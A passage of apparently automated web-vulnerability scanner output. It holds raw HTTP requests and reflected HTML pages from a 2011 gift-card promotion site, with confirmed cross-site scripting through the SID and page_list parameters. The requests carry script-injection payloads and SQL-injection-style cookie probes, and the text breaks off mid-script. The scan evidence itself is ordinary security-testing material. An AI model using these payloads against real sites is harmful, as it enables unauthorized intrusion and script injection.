<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0000A9)</script>" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0000A9)</script>" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET '"--></style></script><script>alert(0x0000AA)</script>
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000AA)%3C/script%3E&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916209; scook=1303916209; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==; concat(CONCAT(CHAR(95)=; CHAR(33)=; CHAR(64)=; CHAR(52)=; CHAR(100)=; CHAR(105)=; CHAR(108)=; CHAR(101)=; CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:57:33 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82edddfc74rtr;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/media/global_reg.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID='"--></style></script><script>netsparker(0x0000AA)</script>','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0000AA%29%3C%2Fscript%3E" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0000AA%29%3C%2Fscript%3E" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0000AA%29%3C%2Fscript%3E#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0000AA%29%3C%2Fscript%3E#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0000AA%29%3C%2Fscript%3E" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0000AA%29%3C%2Fscript%3E" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0000AA%29%3C%2Fscript%3E" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0000AA%29%3C%2Fscript%3E" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0000AA%29%3C%2Fscript%3E" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0000AA%29%3C%2Fscript%3E" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



<!-- The Useful event tag. Do not remove --><script type="text/javaScript">na_fn='';na_ln='';na_zc='';na_cy='819afceb77fc676fdc2423ab';na_st='xx';na_a1='_skip819afcebe33d64b4efa5b47c';na_a2='';na_em='dork@webprizeland.com';</script><script type="text/javascript">if ('**' == 'us'){// commented out to disable nextAction. system down 4/28/09 mpt - if ("http:" == document.location.protocol) { document.write(unescape("%3Cscript src='http://e.nexac.com/e/a-1077/s-1949.js' type='text/javascript'%3E%3C/script%3E")); }}</script><!-- QI third party pixel --><script type="text/javaScript">if ('' != '59'){ if ("http:" == document.location.protocol){ document.write(unescape("%3Ciframe src='http://i.pcp001.com/media/qi.html?gender=&age=0&firstname=&lastname=&gender=&street=_skip819afcebe33d64b4efa5b47c&city=819afceb77fc676fdc2423ab&state=xx&zip=&email=dork@webprizeland.com' scrolling='no' frameborder='0' width='1' height='1'%3E%3C/iframe%3E")); }}</script><!-- Rapleaf Pixel --><script type="text/javaScript">if ('' != '59' && '' != ''){ if ("http:" == document.location.protocol) { document.write(unescape("%3Ciframe src='http://i.pcp001.com/media/rapleaf.html?s=' scrolling='no' frameborder='0' width='1' height='1'%3E%3C/iframe%3E")); }}var pixel_domains = ['netradiance.com','my-rewardsvault.com','consumerincentiverewards.com','superbrewards.com','your-gift-zone.com','consumerincentivepromotions.com','nationalsurveypanel.com','mypremiumrewards.com','holiday-reward-vault.com','onlinerewardcenter.com','exclusivegiftcards.com','go-free-gifts.com','cellphoneincentives.com','brand-reward-central.com','brandsurveypanel.com','video-game-rewards-central.com','premiumproductsonline.com','my-reward-channel.com','premium-reward-club.com','cool-premiums.com','exclusivesamples.com','gameconsolerewards.com'];var show_pixel = false;for ( var i =0 ; i < pixel_domains.length; ++i ) {if ( pixel_domains[i] == "your-gift-zone.com") {show_pixel = true;break;}}show_pixel = false;if ( show_pixel == true ) {document.write(unescape("%3Ciframe frameborder='0' style='height:0;width:0;' src='http://www.freebieclubs.com/member/index.jsp?6gZYlfy7Y7Q=&userEmail=dork@webprizeland.com&userName=&status='%3E%3C/iframe%3E"));}</script><form name="flgxfrm" id="frm_flgxfrm"><input type="hidden" name="SID" value="%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0000AA%29%3C%2Fscript%3E" /><input type="hidden" name="uniqueID" value="200492244"><input type="hidden" name="id" value="132387"><input type="hidden" name="offerID" value=""><input type="hidden" name="fullname" value=""><input type="hidden" name="fname" value=""><input type="hidden" name="lname" value=""><input type="hidden" name="address1" value=""><input type="hidden" name="address2" value=""><input type="hidden" name="city" value=""><input type="hidden" name="state" value="xx"><input type="hidden" name="postalcode" value=""><input type="hidden" name="country" value="**"><input type="hidden" name="email" value="dork@webprizeland.com"><input type="hidden" name="phone" value=""><input type="hidden" name="other1" value="90563525"><input type="hidden" name="other2" value=""></form><div id="flpx_52_118" style="height:1px; width:1px;"></div><script type="text/javascript" language="javascript">var _flbtn="";if(document.getElementById('frm_flgxfrm').SID) { document.getElementById('frm_flgxfrm').SID.value = ''; document.getElementById('frm_flgxfrm').SID.name = 'sid'; }if( == 599) {if('your-gift-zone.com' == 'your-gift-zone.com' || 'your-gift-zone.com' == 'my-rewardsvault.com' || 'your-gift-zone.com' == 'consumerincentiverewards.com' || 'your-gift-zone.com' == 'nationalsurveypanel.com' || 'your-gift-zone.com' == 'consumerincentivepromotions.com' || 'your-gift-zone.com' == 'go-free-gifts.com' || 'your-gift-zone.com' == 'premiumproductsonline.com' || 'your-gift-zone.com' == 'exclusivegiftcards.com' || 'your-gift-zone.com' == 'video-game-rewards-central.com' || 'your-gift-zone.com' == 'holiday-reward-vault.com' || 'your-gift-zone.com' == 'onlinerewardcenter.com' || 'your-gift-zone.com' == 'mypremiumrewards.com' || 'your-gift-zone.com' == 'topchoiceincentives.com' || 'your-gift-zone.com' == 'brand-reward-central.com' || 'your-gift-zone.com' == 'superbrewards.com' || 'your-gift-zone.com' == 'premium-reward-club.com' || 'your-gift-zone.com' == 'freegrocerycentral.com' || 'your-gift-zone.com' == 'cool-premiums.com' || 'your-gift-zone.com' == 'nationalissuepanel.com' || 'your-gift-zone.com' == 'consumertastepanel.com' || 'your-gift-zone.com' == 'bobbing-for-apples-online.com' || 'your-gift-zone.com' == 'your-hot-gift-zone.com') {var tci="flx52"; doc..
- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET '"--></style></script><script>alert(0x0000AB)</script>

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000AB)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916209; scook=1303916209; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==; concat(CONCAT(CHAR(95)=; CHAR(33)=; CHAR(64)=; CHAR(52)=; CHAR(100)=; CHAR(105)=; CHAR(108)=; CHAR(101)=; CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:57:36 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82ee0b939fe0x;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





